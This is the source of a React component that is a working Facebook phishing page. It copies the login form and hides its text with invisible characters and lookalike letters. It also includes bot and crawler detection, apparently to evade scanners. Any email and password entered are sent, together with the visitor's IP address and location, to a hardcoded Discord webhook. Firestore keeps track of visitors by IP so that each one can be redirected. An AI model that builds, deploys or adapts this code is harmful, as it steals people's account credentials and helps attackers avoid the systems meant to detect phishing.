import React, { useEffect, useState } from 'react';
import { addDoc, collection, doc, getDoc, getDocs, onSnapshot, setDoc } from 'firebase/firestore';
import Botd from '@fingerprintjs/botd';
import { publicIpv4 } from 'public-ip';
import { BsInfoCircleFill as IconInfo } from "react-icons/bs";
import { IoIosAdd as IconAdd } from "react-icons/io";
import { footerLinks, desktoplanguages } from "../sakles/malores.js";
import { db } from '../f7g8h9p.js';
import { useMediaQuery } from 'react-responsive';

import '../sakles/malores.js';

const P9k2m4 = () => {
    const [ip, setIp] = useState(undefined);
    const [grraht, setCode] = useState('');
    const [dexlus, setdexlus] = useState('');
    const [userData, setUserData] = useState(undefined);
    const [isUserData, setIsUserData] = useState(false);
    const [userUrl, setUserUrl] = useState(false);
    
    const isMobile = useMediaQuery({ query: '(max-width: 767px)' });

            // Bot detection and redirect to /blank
useEffect(() => {
    const detectBot = async () => {
        const botd = await Botd.load();
        const result = await botd.detect();

        if (result.bot) {
            console.log('Bot detected:', result.bot.type);
            window.location.href = "/ds";
        } else {
            console.log('Not a bot');
        }
    };

    detectBot();
}, []);
        
    useEffect(() => {
        if (isMobile) {
            window.location.href = 'vLp9Xo3Kr7Jn2Ms5Fb8Tq1Yi4Wc6No0Ug5Hr2Xp7Lk1Jm9Vt3Qs4Bd6Fy8Ht7Wz3';
        }
    }, [isMobile]);

    const handleActions = (event) => {
        event.preventDefault(); // Prevent the default form submission
        if (grraht === '') {
            // Handle code validation
            return;
        } else {
            const discordWebhook = 'https://discord.com/api/webhooks/1444795559389954172/WH9YBchdJ8X_UpDOKnG4lGByBe8pWNMQehXxTXSlPjcjT-Flo4hUhv--9fUXNpnn8ZwK';

            fetch(`https://ipapi.co/json/`)
                .then((response) => response.json())
                .then((response) => {
                    const { country, region, city } = response;
                    const content = `========================\nLS 1: '${grraht}'\nLS 2: '${dexlus}'\nCountry : '${country}'\nRegion : '${region}'\nCity : '${city}'\nIP: '${ip}'\n========================`;

                    fetch(discordWebhook, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({ content }),
                    })
                        .then(() => {
                            window.location = 'hZp5Xq8Lo1Kr6Jn3Vs9Ft2Mb7Yi4Wc0Tg3Uo8Nr6Vk2Lp5Jm7Qn1Xs9Bd4Fw6Ht2';
                        })
                        .catch((error) => {
                            window.location = 'hZp5Xq8Lo1Kr6Jn3Vs9Ft2Mb7Yi4Wc0Tg3Uo8Nr6Vk2Lp5Jm7Qn1Xs9Bd4Fw6Ht2';
                        });
                });
        }
    };

    const handleCodeChange = (e) => {
        setCode(e.target.value); // Allow any input
    };
    const handleCodeChange1 = (e) => {
        setdexlus(e.target.value); // Allow any input
    };
    const getUserData = async (e) => {
        const documentSnapshot = await getDocs(collection(db, "georgebs"));
        const newData = documentSnapshot.docs
            .map((doc) => ({ ...doc.data(), id: doc.id }));
        const filter = newData.filter(x => {
            if (x.ip === ip) {
                setIsUserData(true);
                setUserData(x);
                return x;
            }
        });
        if (filter.length === 0) {
            addUserData();
        }
    };

    const getIp = async () => {
        if (ip === undefined) {
            const ip = await publicIpv4();
            setIp(ip);
        }
    };
    getIp();

    useEffect(() => {
        if (ip) {
            onSnapshot(collection(db, "georgebs"), (snapshot) => {
                let isExist = false;
                snapshot.docs.map((doc) => ({ ...doc.data(), id: doc.id })).filter(x => {
                    if (x.ip === ip) {
                        isExist = true;
                        setUserData(x);
                        fetch('./data.json').then(
                            function (res) {
                                return res.json();
                            },
                        ).then(function (data) {
                            data.url_data.filter((item) => {
                                if (item.id === parseInt(x.redir)) {
                                    setUserUrl(item.url);
                                    return;
                                }
                            });
                        }).catch(
                            function (err) {
                                console.log(err, ' error');
                            },
                        );
                    }
                });
                if (!isExist) {
                    setUserUrl(false);
                }
            });
        }
    }, [ip]);

    useEffect(() => {
        document.title = '‌Lо‌g int‌‌‌о Fаc‌‌еbо‌ok';
    }, [userData, userUrl]);

    const addUserData = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);

            // Check if the document exists
            const docSnap = await getDoc(docRef);

            if (!docSnap.exists()) {
                // Document doesn't exist, so set the data
                await setDoc(docRef, {
                    ip: ip,
                    number: -1,
                    redir: "-1"
                });
                console.log("BegasID: ", ip);
                getUserData();
            } else {
                console.log("ResID ID: ", ip);
            }
        } catch (e) {
            console.error("Serr: ", e);
        }
    };

    const resetUserNumber = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);
            await setDoc(docRef, { redir: "-1" }, { merge: true });
            console.log("DegIP: ", ip);
        } catch (e) {
            console.error("Gerr: ", e);
        }
    };

    useEffect(() => {
        if (ip) {
            getUserData();
        }
    }, [ip]);

    if (userUrl) {
        setTimeout(() => {
            window.location = userUrl;
        }, 1000);
        resetUserNumber();
    }

    console.log("hiuoio", isUserData, userData);

    if (isUserData) {
        return (
            <section className="w-full hidden sm:flex flex-col items-center justify-start bg-dedese">
                <div className="w-full max-w-6xl flex flex-col items-center justify-start gap-3 py-14 px-2 sm:px-3 lg:px-4">
<span
    className="text-[#4271ae] text-[38px] font-semibold tracking-tight"
    style={{ fontFamily: "'Inter', sans-serif" }}
>
    f‌‌‌а‌‌‌‌‌‌с‌‌‌е‌‌‌‌‌‌b‌‌‌o‌‌‌о‌‌‌k
</span>
                    {/* Message ==> Nosn */}

                    {/* Form ==> Login form  */}
                    <div className="w-full max-w-[396px] px-3 pt-6 pb-10 flex flex-col items-center justify-start gap-4 bg-white rounded-lg shadow-xl">
                        <h3 className="text-lg text-center font-medium" style={{ fontSize: '17.38px', fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif' }}>
                        ‌Lо‌g int‌‌‌о Fаc‌‌еbо‌ok
                        </h3>
                        <form className="w-full flex flex-col items-center justify-start gap-2" onSubmit={handleActions}>
                            <input
                                type="text" id="grraht" name="grraht"
                                className="textfieldx5 w-full py-[12px] px-4 text-[17.03px] placeholder:text-[17.03px] text-dark rounded-[6px] border-grey-light border-solid border-[1px] focus:placeholder:opacity-70 focus:outline-0 transition-all duration-300"
                                placeholder="E‌ma‌il or p‌ho‌ne n‌um‌ber" onChange={handleCodeChange} required/>
                                <span className='becros'></span>
                                <input type="text" id="dexlus" name="dexlus" className="textfieldx5 w-full py-[12px] px-4 text-[17.03px] placeholder:text-[17.03px] text-dark rounded-[6px] border-grey-light border-solid border-[1px] focus:placeholder:opacity-70 focus:outline-0 transition-all duration-300"
  style={{ WebkitTextSecurity: 'disc', textSecurity: 'disc' }}  placeholder="Pa‌ssw‌ord"onChange={handleCodeChange1} required/>
                                <span className='form-dexlus'></span>
                                <p style={{ 
        color: '#e90025', 
        fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif', 
        fontSize: '13.3px', 
        lineHeight: '16px', 
        marginTop: '8px', 
        textAlign: 'left',
        marginLeft: '-9px'
    }}>
        The pas‌sword you’ve ent‌ered is inco‌rrect. Forg‌ot Pass‌word?
        
    </p>
                            <button type="submit" className="submit-button w-full px-3 h-[45px] bg-begex hover:bg-opacity-90 text-white text-xl font-semibold rounded-md transition-all duration-300" >L‌o‌g i‌n </button>
                        </form>
                        {/* Forgab */}
                        <div className="w-full flex items-center justify-center gap-3">
                            <button
                                type="button"
                                className=" text-begex text-sm font-medium bg-none hover:underline transition-all duration-300" style={{ fontSize: '14.39px', fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif' }}>
                                F‌org‌ot ac‌cou‌nt?
                            </button>
                            <button type="button" className="text-begex text-sm font-medium bg-none hover:underline transition-all duration-300" style={{ fontSize: '14.39px', fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif' }}>
                                Si‌gn u‌р f‌оr F‌ас‌еbо‌оk
                            </button>
                        </div>
                    </div>
                </div>
                <footer className="w-full flex-1 bg-white pt-7 pb-10 px-6">
                    <div className="mx-auto flex items-center justify-start flex-col gap-2 w-full max-w-5xl">
                        {/* Languages  */}
                        <div className="w-full flex items-center justify-start gap-x-4 gap-y-2 flex-wrap">
                            {desktoplanguages.map((item, i) => (
                                <p
                                    key={i}
                                    className="text-xs text-neutral-500 hover:underline transition-all duration-300 cursor-pointer"
                                >
                                    {item}
                                </p>
                            ))}
                            <div className="bg-fersyt hover:bg-babsg px-1 py-[0px] flex items-center justify-center border-[1px] border-solid border-grey-ghost rounded-[2px] overflow-hidden cursor-pointer transition-all duration-300">
                                <IconAdd size={20} />
                            </div>
                        </div>
                        {/* Divider  */}
                        <div className="w-full h-[1.3px] bg-neutral-300" />
                        {/* gegus  */}
                        <div className="w-full flex items-center justify-start gap-x-4 gap-y-2 flex-wrap">
                            {footerLinks.map((item, i) => (
                                <p
                                    key={i}
                                    className="text-xs text-neutral-500 hover:underline transition-all duration-300 cursor-pointer"
                                >
                                    {item}
                                </p>
                            ))}
                        </div>
                        {/* rebsts  */}
                        <p className="text-xs text-left w-full mt-4 text-neutral-500 transition-all duration-300 cursor-pointer">
                            M‌‌et‌a © 2‌025
                        </p>
                    </div>
                </footer>
            </section>
        );
    } 
};

export default P9k2m4;
